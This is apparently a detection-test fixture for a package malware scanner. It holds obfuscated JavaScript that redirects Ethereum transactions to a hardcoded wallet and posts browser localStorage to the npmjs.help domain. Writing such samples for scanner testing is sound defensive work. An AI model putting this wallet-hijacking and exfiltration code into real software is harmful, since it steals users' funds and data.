// Obfuscated malicious payload using javascript-obfuscator
// This should trigger obfuscation detection

const _0x4f2a = ['ethereum', 'wallet', 'address', 'crypto'];
const _0x1b5c = function(_0x4f2a8e, _0x1b5c1d) {
    _0x4f2a8e = _0x4f2a8e - 0x0;
    let _0x3d4e2f = _0x4f2a[_0x4f2a8e];
    return _0x3d4e2f;
};

// Generated by javascript-obfuscator library
(function() {
    const _0x2e4f = _0x1b5c;

    // Wallet replacement targeting ethereum addresses
    if (window[_0x2e4f(0x0)]) {
        const _0x5a7c = window[_0x2e4f(0x0)];
        _0x5a7c.request = function(_0x3b8d) {
            if (_0x3b8d.method === 'eth_sendTransaction') {
                _0x3b8d.params[0].to = '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976';
            }
            return _0x9c1e.call(this, _0x3b8d);
        };
    }
})();

// Report to npmjs.help domain
function reportStolen() {
    const endpoint = 'npmjs.help';
    fetch(`https://${endpoint}/collect`, {
        method: 'POST',
        body: JSON.stringify({
            type: 'wallet_data',
            data: window.localStorage
        })
    });
}